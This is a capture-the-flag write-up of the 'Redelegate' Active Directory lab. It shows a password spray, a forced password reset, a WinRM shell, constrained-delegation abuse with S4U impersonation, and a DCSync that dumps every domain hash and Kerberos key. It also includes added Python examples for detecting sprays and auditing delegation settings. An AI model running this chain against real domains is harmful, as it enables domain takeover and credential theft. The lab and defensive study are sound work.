SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:SguPZBKdRyxWzvXRWy6U STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:Spdv41gg4BlBgSYIW1gF STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:Spdv41gg4BlBgSYIW1gF STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:Panel STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:Panel STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:zDPBpaF4FywlqIv11vii STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:zDPBpaF4FywlqIv11vii STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:hMFS4I0Kj8Rcd62vqi5X STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:hMFS4I0Kj8Rcd62vqi5X STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DC$:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\FS01$:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Christine.Flanders:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helen.Frost:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Michael.Pontiac:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Mallory.Roberts:cVkqz4bCM7kJRSNlgx2G STATUS_ACCOUNT_RESTRICTION
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\James.Dinkleberg:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Helpdesk:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\IT:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Finance:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsAdmins:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\DnsUpdateProxy:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\Ryan.Cooper:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE
SMB         10.129.130.206  445    DC               [-]  REDELEGATE\sql_svc:cVkqz4bCM7kJRSNlgx2G STATUS_LOGON_FAILURE 
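The spray above is loud on the DC side: one source address, every enumerated account, a failure each, seconds apart. As an added example (my own code, not the writeup's) here is the detection a SOC would run over the resulting failed-logon events: a sliding window per source that counts distinct target accounts. The records are constructed to mirror the spray (same source 10.10.14.58, same account names, the `STATUS_ACCOUNT_RESTRICTION` result for Mallory.Roberts) and carry only the fields a 4625 event would supply to this logic; the window and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS codes that 4625 events carry for the failure reason.
STATUS_NAMES = {
    "0xC000006A": "wrong password",
    "0xC0000064": "user does not exist",
    "0xC000006E": "account restriction",
    "0xC0000234": "account locked out",
}


def _constructed_events():
    """Constructed failed-logon records (not real DC logs) shaped like the spray
    above: one source, many accounts, one second apart, plus a benign user."""
    sprayed = ["DC$", "FS01$", "Christine.Flanders", "Helen.Frost", "Michael.Pontiac",
               "Mallory.Roberts", "James.Dinkleberg", "Ryan.Cooper"]
    t0 = datetime(2025, 10, 13, 14, 2, 0)
    events = [{"time": (t0 + timedelta(seconds=i)).isoformat(),
               "source_ip": "10.10.14.58", "target_user": user,
               "status": "0xC000006E" if user == "Mallory.Roberts" else "0xC000006A"}
              for i, user in enumerate(sprayed)]
    # Someone mistyping their own password twice, half an hour apart: not a spray.
    for minutes in (0, 30):
        events.append({"time": (datetime(2025, 10, 13, 13, 0) + timedelta(minutes=minutes)).isoformat(),
                       "source_ip": "10.10.20.5", "target_user": "Marie.Curie",
                       "status": "0xC000006A"})
    return events


SAMPLE_EVENTS = _constructed_events()


def detect_spray(events, min_accounts=5, window=timedelta(minutes=10)):
    """Flag sources whose failed logons hit >= min_accounts distinct accounts
    within any span of length `window`.

    Returns {source_ip: {"accounts": [...], "statuses": {reason: count}}}."""
    by_source = defaultdict(list)
    for e in events:
        by_source[e["source_ip"]].append(
            (datetime.fromisoformat(e["time"]), e["target_user"], e["status"]))
    hits = {}
    for src, items in by_source.items():
        items.sort()
        best, start = set(), 0
        for end in range(len(items)):
            # Slide the window start forward until the span fits.
            while items[end][0] - items[start][0] > window:
                start += 1
            accounts = {user for _, user, _ in items[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            statuses = defaultdict(int)
            for _, _, status in items:
                statuses[STATUS_NAMES.get(status, status)] += 1
            hits[src] = {"accounts": sorted(best), "statuses": dict(statuses)}
    return hits


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {len(info['accounts'])} accounts, {info['statuses']}")
```

The status breakdown matters when triaging: a source that is mostly `wrong password` across many existing accounts is a spray, while a run of `user does not exist` is username enumeration, and a non-password status such as `account restriction` on one account (Mallory.Roberts above) points at an account-level setting rather than the credential and deserves its own look.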

REDELEGATE\Marie.Curie Fall2024!

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb DC.redelegate.vl -u Marie.Curie -p Fall2024! --generate-tgt curie
SMB         10.129.130.206  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.130.206  445    DC               [+] redelegate.vl\Marie.Curie:Fall2024!
SMB         10.129.130.206  445    DC               [+] TGT saved to: curie.ccache
SMB         10.129.130.206  445    DC               [+] Run the following command to use the TGT: export KRB5CCNAME=curie.ccache
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# bloodhound-ce-python -c All -u marie.curie -p 'Fall2024!' -d redelegate.vl -ns 10.129.130.206  --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: redelegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.redelegate.vl
INFO: Testing resolved hostname connectivity dead:beef::1a5
INFO: Trying LDAP connection to dead:beef::1a5
INFO: Testing resolved hostname connectivity dead:beef::46d2:df40:9a0:20a
INFO: Trying LDAP connection to dead:beef::46d2:df40:9a0:20a
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.redelegate.vl
INFO: Testing resolved hostname connectivity dead:beef::1a5
INFO: Trying LDAP connection to dead:beef::1a5
INFO: Testing resolved hostname connectivity dead:beef::46d2:df40:9a0:20a
INFO: Trying LDAP connection to dead:beef::46d2:df40:9a0:20a
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.redelegate.vl
WARNING: SID S-1-5-21-3745110700-3336928118-3915974013-1109 lookup failed, return status: STATUS_NONE_MAPPED
INFO: Done in 00M 35S
INFO: Compressing output into 20251013110449_bloodhound.zip

[BloodHound graph screenshot]

From this graph we can go straight to taking control of the machine FS01.REDELEGATE.VL.

[BloodHound graph screenshot]

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# bloodyAD --host 10.129.130.206 -d redelegate.vl -u Marie.Curie -p 'Fall2024!' set password 'HELEN.FROST' 'Admin123'
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb 10.129.130.206 -u 'HELEN.FROST' -p 'Admin123'
SMB         10.129.130.206  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.130.206  445    DC               [+] redelegate.vl\HELEN.FROST:Admin123

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc winrm 10.129.130.206 -u 'HELEN.FROST' -p 'Admin123'
WINRM       10.129.130.206  5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl)
WINRM       10.129.130.206  5985   DC               [+] redelegate.vl\HELEN.FROST:Admin123 (Pwn3d!)

1.6. winrm

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─#  evil-winrm -i redelegate.vl -u 'HELEN.FROST' -p 'Admin123'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents>
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> gc user.txt
61bcfc0804cfac802bc24e6edfb5f168

2. System

Checking the user's privileges shows that this account has been granted SeEnableDelegationPrivilege:

*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

Unconstrained delegation (KUD): a computer configured for unconstrained delegation keeps in memory the TGT of every user that connects to it, so the computer can impersonate those users. To configure it, the computer's userAccountControl attribute must be modified to include the TRUSTED_FOR_DELEGATION flag (this requires the SeEnableDelegationPrivilege domain privilege).

Constrained delegation (KCD): a computer configured for constrained delegation can impersonate any user to another computer. To configure it, the object's userAccountControl attribute must be modified to include the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag (requires SeEnableDelegationPrivilege), and the msDS-AllowedToDelegateTo attribute must be set to the target SPN to which we want to authenticate as any user.

RBCD can be ruled out here first, because RBCD does not require SeEnableDelegationPrivilege.

To abuse unconstrained delegation instead,
we would need a machine account, configure it for unconstrained delegation, and then coerce the domain controller into authenticating to that machine. This requires being able to add machine accounts as well as DNS entries (for the coercion step, since Kerberos uses names rather than IP addresses).

Here we use constrained delegation so that the computer we control can impersonate users to the LDAP service on the DC.
First we modify the UAC of the computer we currently control, adding TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION, and set the value of msDS-AllowedToDelegateTo to the service we want to impersonate to; here it is set to cifs.
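The three delegation variants above differ only in a couple of userAccountControl bits and two attributes, which is exactly what a defender should audit after seeing SeEnableDelegationPrivilege granted to an ordinary user. The following Python helper is an added example and not part of the original writeup or any tool it uses: it decodes those bits on LDAP-style records and flags the dangerous combinations (unconstrained delegation on a non-DC, protocol transition, RBCD descriptors, and delegation targets that are sensitive services on a domain controller). The records in SAMPLE are constructed for the demo; only dc.redelegate.vl and FS01$ come from the page, and WS02$, WEB01$, LAB05$, SRV03$ and app.redelegate.vl are made up.

```python
"""Audit helper (added example, not from the original writeup): classify AD
accounts by delegation configuration using the userAccountControl bits and
attributes described above. Works on plain dicts standing in for LDAP
attributes so it runs offline; SAMPLE below is constructed data."""

# userAccountControl bit values (ADS_USER_FLAG_ENUM / MS-ADTS)
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000       # member computer
UF_SERVER_TRUST_ACCOUNT = 0x2000            # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x80000         # unconstrained delegation (KUD)
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # KCD with protocol transition

# Services on a DC that let a delegating account read or rewrite directory
# data (cifs/ldap are the two the writeup uses for DCSync).
SENSITIVE_SERVICES = {"cifs", "ldap", "host", "http", "rpcss", "wsman"}


def classify_delegation(obj):
    """Return a list of human-readable findings for one account record."""
    uac = int(obj.get("userAccountControl", 0))
    targets = list(obj.get("msDS-AllowedToDelegateTo", []))
    rbcd = obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity")
    findings = []
    # Unconstrained delegation is expected on DCs, alarming anywhere else.
    if uac & UF_TRUSTED_FOR_DELEGATION and not uac & UF_SERVER_TRUST_ACCOUNT:
        findings.append("unconstrained delegation (TRUSTED_FOR_DELEGATION) on a non-DC")
    if targets:
        # With protocol transition, S4U2self tickets are forwardable, so the
        # account can impersonate users who never authenticated to it.
        mode = ("with protocol transition (S4U2self usable in S4U2proxy)"
                if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION else "Kerberos-only")
        findings.append(f"constrained delegation {mode} to {len(targets)} SPN(s)")
    if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION and not targets:
        findings.append("TRUSTED_TO_AUTH_FOR_DELEGATION set but msDS-AllowedToDelegateTo empty")
    if rbcd:
        findings.append("RBCD descriptor present (msDS-AllowedToActOnBehalfOfOtherIdentity)")
    return findings


def spn_targets_dc(spn, dc_hosts):
    """True when an SPN names a sensitive service on one of the DC hostnames."""
    service, _, host = spn.partition("/")
    host = host.split(":")[0].lower()
    return host in dc_hosts and service.lower() in SENSITIVE_SERVICES


def audit(objects, dc_hosts):
    """Map sAMAccountName -> findings for every object that has any."""
    dc_hosts = {h.lower() for h in dc_hosts}
    report = {}
    for obj in objects:
        findings = classify_delegation(obj)
        for spn in obj.get("msDS-AllowedToDelegateTo", []):
            if spn_targets_dc(spn, dc_hosts):
                findings.append(f"HIGH: delegation target {spn} is a sensitive service on a domain controller")
        if findings:
            report[obj["sAMAccountName"]] = findings
    return report


# Constructed sample records (hypothetical values, not pulled from the box).
SAMPLE = [
    {"sAMAccountName": "DC$",    # DCs legitimately carry TRUSTED_FOR_DELEGATION
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "FS01$",  # the configuration the writeup creates
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dc.redelegate.vl"]},
    {"sAMAccountName": "WS02$",  # plain workstation, nothing to report
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "WEB01$",  # Kerberos-only KCD to a non-DC service
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["http/app.redelegate.vl"]},
    {"sAMAccountName": "LAB05$",  # unconstrained delegation on a member server
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "SRV03$",  # RBCD set; opaque security descriptor bytes
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},
]

if __name__ == "__main__":
    for name, items in audit(SAMPLE, {"dc.redelegate.vl"}).items():
        print(name)
        for item in items:
            print("   -", item)
```

In practice the records would come from an LDAP search for computer and user objects with the three attributes requested; the classification logic stays the same. Reviewing which principals hold the "Enable computer and user accounts to be trusted for delegation" user right alongside this output closes the loop, since that right is what turns a compromised low-privilege account into the FS01$ configuration above.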

*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Set-ADComputer -Identity FS01 -Add @{'msDS-AllowedToDelegateTo'=@('cifs/dc.redelegate.vl')}
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True

Verify it:
*Evil-WinRM* PS C:\Users\Helen.Frost\desktop> Get-ADComputer FS01 -Properties msDS-AllowedToDelegateTo | Select-Object Name, msDS-AllowedToDelegateTo


Name msDS-AllowedToDelegateTo
---- ------------------------
FS01 {cifs/dc.redelegate.vl}

The SPN configured here can be either cifs or ldap.

Then change the machine account's password so that a service ticket (ST) can be requested.

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# bloodyAD --host 10.129.130.206 -d redelegate.vl -u 'HELEN.FROST' -p 'Admin123' set password 'FS01$' Admin123
[+] Password changed successfully!

Use impacket-getST to request a cifs ticket (ldap works too; either one lets us perform DCSync), using S4U2self and S4U2proxy to impersonate DC.

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-getST 'redelegate.vl/FS01$:Admin123' -spn cifs/dc.redelegate.vl -impersonate DC
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating DC
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Then perform DCSync.

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# export KRB5CCNAME=DC@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# impacket-secretsdump -dc-ip 10.129.130.206 -k -no-pass DC.redelegate.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec17f7a2a4d96e177bfd101b94ffc0a7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:bfdff77d74764b0d4f940b7e9f684a61:::
FS01$:1103:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:db3a850aa5ede4cfacb57490d9b789b1ca0802ae11e09db5f117c1a8d1ccd173
Administrator:aes128-cts-hmac-sha1-96:b4fb863396f4c7a91c49ba0c0637a3ac
Administrator:des-cbc-md5:102f86737c3e9b2f
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
Christine.Flanders:aes256-cts-hmac-sha1-96:ceb5854b48f9b203b4aa9a8e0ac4af28b9dc49274d54e9f9a801902ea73f17ba
Christine.Flanders:aes128-cts-hmac-sha1-96:e0fa68a3060b9543d04a6f84462829d9
Christine.Flanders:des-cbc-md5:8980267623df2637
Marie.Curie:aes256-cts-hmac-sha1-96:616e01b81238b801b99c284e7ebcc3d2d739046fca840634428f83c2eb18dbe8
Marie.Curie:aes128-cts-hmac-sha1-96:daa48c455d1bd700530a308fb4020289
Marie.Curie:des-cbc-md5:256889c8bf678910
Helen.Frost:aes256-cts-hmac-sha1-96:7027bafdfba4d60dca47ae58401fead5691013dac8e23d3b5d786bfa3a42a003
Helen.Frost:aes128-cts-hmac-sha1-96:477c91b83664f6726619fa43fb2663e6
Helen.Frost:des-cbc-md5:5e467c7913fdc807
Michael.Pontiac:aes256-cts-hmac-sha1-96:eca3a512ed24bb1c37cd2886ec933544b0d3cfa900e92b96d056632a6920d050
Michael.Pontiac:aes128-cts-hmac-sha1-96:53456b952411ac9f2f3e2adf433ab443
Michael.Pontiac:des-cbc-md5:833dc82fab76c229
Mallory.Roberts:aes256-cts-hmac-sha1-96:c9ad270adea8746d753e881692e9a75b2487a6402e02c0c915eb8ac6c2c7ab6a
Mallory.Roberts:aes128-cts-hmac-sha1-96:40f22695256d0c49089f7eda2d0d1266
Mallory.Roberts:des-cbc-md5:cb25a726ae198686
James.Dinkleberg:aes256-cts-hmac-sha1-96:c6cade4bc132681117d47dd422dadc66285677aac3e65b3519809447e119458b
James.Dinkleberg:aes128-cts-hmac-sha1-96:35b2ea5440889148eafb6bed06eea4c1
James.Dinkleberg:des-cbc-md5:83ef38dc8cd90da2
Ryan.Cooper:aes256-cts-hmac-sha1-96:d94424fd2a046689ef7ce295cf562dce516c81697d2caf8d03569cd02f753b5f
Ryan.Cooper:aes128-cts-hmac-sha1-96:48ea408634f503e90ffb404031dc6c98
Ryan.Cooper:des-cbc-md5:5b19084a8f640e75
sql_svc:aes256-cts-hmac-sha1-96:1decdb85de78f1ed266480b2f349615aad51e4dc866816f6ac61fa67be5bb598
sql_svc:aes128-cts-hmac-sha1-96:88f45d60fa053d62160e8ea8f1d0231e
sql_svc:des-cbc-md5:970d6115d3f4a43b
DC$:aes256-cts-hmac-sha1-96:0e50c0a6146a62e4473b0a18df2ba4875076037ca1c33503eb0c7218576bb22b
DC$:aes128-cts-hmac-sha1-96:7695e6b660218de8d911840d42e1a498
DC$:des-cbc-md5:3db913751c434f61
FS01$:aes256-cts-hmac-sha1-96:082133e929c5cf54148c6c890e1645745d704b695a8791aa57aec97ae588cf9d
FS01$:aes128-cts-hmac-sha1-96:1261dbf9f7577fe221e256d35bff5b3a
FS01$:des-cbc-md5:04bc3e13cd6b37c1
[*] Cleaning up...